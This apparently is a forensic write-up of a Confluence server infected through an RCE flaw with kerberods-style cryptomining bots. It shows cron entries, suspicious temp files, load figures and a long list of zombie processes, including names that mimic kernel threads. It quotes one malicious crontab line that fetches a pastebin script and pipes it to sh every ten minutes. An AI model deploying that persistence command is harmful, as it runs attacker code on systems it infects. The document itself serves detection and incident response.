We'll post findings from an infected Confluence system we investigated recently, to show what such an infection looks and feels like. Most of the systems we looked at were infected with mining bots like kerberods.
The infection took place via the latest and greatest Confluence RCE vulnerability.
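Odd crontab entries for a user. The entry below runs every 10 minutes, fetches a script from pastebin with curl (falling back to wget) and pipes it straight into sh, so the payload comes back as long as the entry exists.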
/var/spool/cron/crontabs # ls -lrth
total 4.0K
-rw------- 1 root netdev 285 Apr 15 15:34 tmp.Rj8JOI
-rw-r--r-- 1 root netdev 0 Apr 16 12:42 root
cat tmp.Rj8JOI
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Apr 15 17:34:25 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * (curl -fsSL https://pastebin.com/raw/404NoMore||wget -q -O- https://pastebin.com/raw/404NoMore)|sh
A good amount of load, even on otherwise unused systems
- at least your monitoring can detect this
# uptime
06:51:47 up 200 days, 23:55, 0 users, load average: 7.53, 6.82, 6.13
07:34:00 up 46 days, 22:57, 0 users, load average: 6.04, 6.10, 6.04
Files in /tmp that look suspicious
- see below for the lok_bot
- the file timestamps at least give you an infection date
# ls -la /tmp
total 1460
drwxrwxrwt 1 root root 4096 Apr 29 08:05 .
drwxr-xr-x 1 root ro 4096 May 10 2018 ..
-rw-r--r-- 1 usr1 usr1 0 Apr 27 14:17 .354da7
-rw-r--r-- 1 usr1 usr1 5 Apr 22 06:23 .XIMunix
drwxr-xr-x 2 usr1 usr1 4096 Apr 19 17:45 .dba <-- Bot
drwxrwx--- 2 usr1 usr1 4096 Apr 27 21:42 .sysinfo <-- Bot
-rw-r--r-- 1 usr1 usr1 20094 Apr 27 20:33 fk <-- KillerBot
drwxr-xr-x 2 usr1 usr1 4096 Mar 13 08:41 hsperfdata_usr1
drwxr-xr-x 2 root root 4096 Oct 7 2016 hsperfdata_root
-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 ib_cm
-rwx------ 1 usr1 usr1 480296 Apr 27 21:42 kworker_0:2
-rwx------ 1 usr1 usr1 473096 Apr 22 18:30 kworker_1:1
-rw-r--r-- 1 usr1 usr1 0 Apr 19 18:04 lok <-- Bot
-rw-r--r-- 1 usr1 usr1 12 Apr 27 20:33 tmp1 <-- Bot
-rw-r--r-- 1 usr1 usr1 0 Apr 21 18:25 .changgggeerror <--Bot
drwxr-xr-x 2 usr1 usr1 4096 Apr 27 15:18 .dba <-- Bot
-rw-r--r-- 1 usr1 usr1 0 Apr 29 06:38 .dbb <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 17 06:57 04dlOCl <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 21 04:50 09m4JAO <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 17 07:17 0B74AiN <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 24 06:28 0C3GIEc <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 22:50 1LgBCd8 <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 21:03 jEgLnBc <-- Bot
-rwxr-xr-x 1 usr1 usr1 1099016 Apr 29 06:38 jGcLFA1 <-- Bot
drwxr-xr-x 2 usr1 usr1 4096 Apr 19 12:47 khugepageds <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 23 00:22 lIFa09m <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 14 11:26 lLNCeDg <-- Bot
-rw-r--r-- 1 usr1 usr1 290 Apr 15 00:37 lMBH5ME <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 27 14:55 lalmC9B <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 24 17:08 lc6hCJM <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 23 03:33 lgl7kBp <-- Bot
-rw-r--r-- 1 usr1 usr1 160 Apr 23 11:32 m3eP059 <-- Bot
--- 400 lines deleted ----
Files in /dev/shm that look suspicious
- see below for the bot
- the file timestamps at least give you an infection date
# ls -la /dev/shm
total 8
drwxrwxrwt 2 root root 60 Apr 18 17:53 .
drwxr-xr-x 5 root root 340 Oct 10 2018 ..
-rw-r--r-- 1 daemon daemon 7141 Apr 18 16:33 bt1.txt
The first confirmed/successful waves started on 2019-04-14:
-rwxrwxrwx 1 daemon daemon 621K Mar 18 06:51 1mm6dgJ <-- maybe?
-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 ec2a6 <-- ???
-rw-r--r-- 1 daemon daemon 0 Apr 12 07:48 de33f4f911f20761 <-- ???
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:12 L2AJgih <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:12 77Ink36 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:15 H4m361b <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:15 1Gn6il2 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:29 JnImMDp <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:29 8N128a8 <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 01:50 1bI0A61 <-- exploit
-rw-r--r-- 1 daemon daemon 160 Apr 14 01:50 Jb2jHPC <-- exploit
-rw-r--r-- 1 daemon daemon 290 Apr 14 02:03 aEEC4K5 <-- exploit
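Lots of zombie processes. All of them belong to usr1 and have PPID 1, which on this system is the Confluence java process itself. Besides kerberods, note the names that imitate kernel threads (khugepageds, kworker_1:1, ib_cm): real kernel threads do not run as an application user, so such names under usr1 are a strong indicator.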
# ps -ef
UID PID PPID C STIME TTY TIME CMD
usr1 1 0 1 Mar13 ? 12:56:36 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Xms1024m -Xmx8192m -XX:MaxPermSize=512m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2019-03-13_08-41-53.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution -Djava.endorsed.dirs=/opt/atlassian/confluence/endorsed -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start
usr1 336 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 339 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 354 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 361 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 382 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 403 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 415 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 427 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 462 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 508 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 516 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 529 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 539 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 544 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 597 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 599 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 642 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 644 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 648 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 663 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 688 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 756 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 858 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 903 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 960 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1015 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 1072 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1086 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1131 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1274 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 1339 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1341 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 1350 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1395 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1422 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1434 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1458 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1523 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1559 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1614 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1664 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1726 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1727 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1748 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 1767 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 1828 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1850 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 1886 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 1930 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 1954 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2064 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2145 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2239 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2266 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2298 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2321 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2322 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 2325 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2360 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2387 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2409 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2472 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2524 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2605 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 2629 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2788 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 2824 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2858 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 2879 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 2881 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 2890 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 2900 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 2932 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 2941 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 3037 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3138 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3164 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 3316 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 3344 1 0 Apr21 ? 00:00:00 [kill] <defunct>
usr1 3367 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 3573 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 3586 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 3622 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 3842 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 3865 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 4089 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 4168 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 4341 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 4353 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 5258 1 0 Apr22 ? 00:00:01 [sh] <defunct>
usr1 5363 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5393 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 5405 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 5425 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 5429 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 5577 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5909 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5973 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 5991 1 82 Apr21 ? 6-20:15:12 [khugepageds] <defunct>
usr1 6028 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6085 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6149 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6174 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6284 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 6299 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6485 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6535 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6560 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6574 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 6664 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 6704 1 0 Apr19 ? 00:00:01 [sh] <defunct>
usr1 6751 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 6853 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6877 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 6907 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 6959 1 0 Apr22 ? 00:00:00 [kill] <defunct>
usr1 7083 1 0 Apr21 ? 00:00:01 [sh] <defunct>
usr1 7118 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 7163 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 7292 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 7300 1 0 Apr20 ? 00:00:01 [sh] <defunct>
usr1 7513 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 7522 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 7537 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 7653 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 7771 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 7820 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 8022 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 8056 1 0 Apr20 ? 00:00:01 [sh] <defunct>
usr1 8198 1 0 Apr14 ? 00:00:00 [kerberods] <defunct>
usr1 8203 1 0 Apr14 ? 00:12:14 [kerberods] <defunct>
usr1 8252 1 27 Apr14 ? 3-23:22:25 [khugepageds] <defunct>
usr1 8656 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 8743 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 8912 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 9042 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 9763 1 0 Apr10 ? 00:00:00 [kerberods] <defunct>
usr1 9768 1 0 Apr10 ? 00:37:13 [kerberods] <defunct>
usr1 9771 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 9806 1 39 Apr10 ? 7-09:16:20 [khugepageds] <defunct>
usr1 10022 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 10036 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 10505 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 10717 1 0 Apr12 ? 00:00:00 [kerberods] <defunct>
usr1 10722 1 0 Apr12 ? 00:17:13 [kerberods] <defunct>
usr1 10761 1 65 Apr12 ? 11-06:36:39 [khugepageds] <defunct>
usr1 10764 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 10834 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 10854 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 10907 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 10943 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 11083 1 0 Apr22 ? 00:00:00 [kerberods] <defunct>
usr1 11089 1 0 Apr22 ? 00:26:43 [kerberods] <defunct>
usr1 11138 1 0 Apr22 ? 00:11:07 [khugepageds] <defunct>
usr1 11390 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 11512 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 11743 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 12151 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 12174 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 12247 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 12404 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 12534 1 0 Apr22 ? 00:00:00 [26d60ac947903df] <defunct>
usr1 12536 1 31 Apr22 ? 2-01:39:08 [kworker_1:1] <defunct>
usr1 12664 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 12707 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 12832 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 12893 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 12920 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 13074 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 13135 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 13687 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 13723 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 13747 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 13929 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 14452 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 14589 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 14829 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15044 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 15452 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15692 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 15698 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15701 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15704 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 15772 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 15831 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 15946 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 15982 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 16055 1 0 Apr23 ? 00:00:00 [26d60ac947903df] <defunct>
usr1 16057 1 99 Apr23 ? 28-10:29:11 [ib_cm] <defunct>
usr1 16353 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 16459 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 16674 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 16697 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 16717 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 16783 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 16796 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 16797 1 0 Apr23 ? 00:00:00 [sed] <defunct>
usr1 16798 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 16871 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 16872 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 16873 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 16874 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 16875 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 16953 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 17117 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 17123 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 17284 1 0 Apr20 ? 00:00:00 [kill] <defunct>
usr1 17397 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 17728 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 17799 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 17973 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18140 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 18225 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 18445 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 18476 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 18580 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 18824 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 18829 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18830 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18833 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18836 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 18852 1 0 Apr21 ? 00:00:00 [sleep] <defunct>
usr1 18870 1 0 Apr21 ? 00:00:00 [sh] <defunct>
usr1 19051 1 0 Apr16 ? 00:00:00 [sh] <defunct>
usr1 19270 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 19315 1 0 Apr16 ? 00:00:00 [kill] <defunct>
usr1 19438 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 19471 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 19635 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19639 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19728 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 19889 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 20022 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 20023 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20024 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20025 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 20026 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 20298 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 20371 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 20388 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 20417 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 20476 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 20477 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20478 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 20479 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 20480 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 20533 1 0 Apr20 ? 00:00:00 [sh] <defunct>
usr1 20747 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 20771 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21018 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21097 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 21170 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21305 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 21310 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 21311 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 21312 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 21313 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 21314 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 21321 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21324 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21327 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 21366 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 21579 1 0 Apr19 ? 00:00:08 [sh] <defunct>
usr1 21785 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 21809 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 21878 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 21931 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 22375 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22614 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22747 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 22748 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 22749 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 22750 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 22751 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 22758 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22761 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 22764 1 0 Apr23 ? 00:00:00 [sh] <defunct>
usr1 23119 1 0 Apr23 ? 00:00:00 [curl] <defunct>
usr1 23171 1 0 Apr23 ? 00:00:00 [ps] <defunct>
usr1 23172 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23173 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23174 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23175 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23176 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23177 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23178 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23179 1 0 Apr23 ? 00:00:00 [awk] <defunct>
usr1 23180 1 0 Apr23 ? 00:00:00 [grep] <defunct>
usr1 23181 1 0 Apr23 ? 00:00:00 [xargs] <defunct>
usr1 23432 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23769 1 0 Apr22 ? 00:00:00 [bash] <defunct>
usr1 23800 1 0 Apr22 ? 00:00:00 [sleep] <defunct>
usr1 23810 1 0 Apr23 ? 00:00:00 [sleep] <defunct>
usr1 23858 1 0 Apr19 ? 00:00:00 [sh] <defunct>
usr1 23882 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24055 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24135 1 0 Apr19 ? 00:00:00 [kill] <defunct>
usr1 24675 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 24683 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24686 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24689 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 24767 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 25036 1 0 Apr18 ? 00:00:00 [sh] <defunct>
usr1 25230 1 0 Apr19 ? 00:00:32 [khugepageds] <defunct>
usr1 25289 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 25360 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25493 1 0 Apr24 ? 00:00:00 [ps] <defunct>
usr1 25494 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 25495 1 0 Apr24 ? 00:00:00 [grep] <defunct>
usr1 25496 1 0 Apr24 ? 00:00:00 [awk] <defunct>
usr1 25497 1 0 Apr24 ? 00:00:00 [xargs] <defunct>
usr1 25507 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25510 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25513 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25854 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 25996 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 26108 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26348 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26588 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26642 1 0 Apr19 ? 00:00:00 [sleep] <defunct>
usr1 26829 1 0 Apr24 ? 00:00:00 [sleep] <defunct>
usr1 26835 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26838 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26841 1 0 Apr24 ? 00:00:00 [sh] <defunct>
usr1 26910 1 0 Apr18 ? 00:00:00 [kill] <defunct>
usr1 26973 1 0 Apr19 ? 00:00:00 [bash] <defunct>
usr1 27220 1 0 Apr22 ? 00:00:00 [touch] <defunct>
usr1 27223 1 0 Apr17 ? 00:00:00 [sh] <defunct>
usr1 27247 1 0 Apr17 ? 00:00:00 [kill] <defunct>
usr1 27309 1 0 Apr19 ? 00:00:00 [sleep] <defunct>
usr1 27383 1 0 Apr19 ? 00:00:11 [sh] <defunct>
